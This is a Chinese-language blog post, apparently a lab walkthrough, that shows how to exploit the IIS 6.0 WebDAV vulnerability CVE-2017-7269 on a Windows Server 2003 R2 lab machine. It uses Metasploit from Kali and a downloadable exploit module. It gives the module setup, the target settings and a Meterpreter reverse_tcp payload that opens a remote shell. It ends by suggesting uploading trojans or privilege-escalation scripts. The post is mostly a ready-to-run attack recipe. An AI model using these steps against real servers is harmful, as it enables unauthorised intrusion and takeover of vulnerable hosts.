一.实验环境搭建

1.目标机:windows server 2003 r2

需要目标服务器开启WebDAV


靶机IP:192.168.75.134

Kali IP : 192.168.75.129

kali中启动Msf,使用CVE-2017-7269攻击插件

use exploit/windows/iis/cve_2017_7269

没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下载脚本,并且 把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下,然后reload_all进行启用

使用show options查看相关攻击参数

set RHOSTS 192.168.75.134

set HttpHost 192.168.75.134

设置返回载荷

set payload windows/meterpreter/reverse_tcp

使用exploit 或者run进行攻击

获取到连接

输入shell命令,来到了我们所熟悉的界面

查看当前用户权限,whoami

普通权限,但是可以通过msf的上传功能传递木马或者提权脚本

分类: CVE

天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

一人自负一阴阳,混沌分开气升降。炼阴仙客解冲虚,凡骨尤能化百族。雷域龙神启太元,天清升仙出浩渊。

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注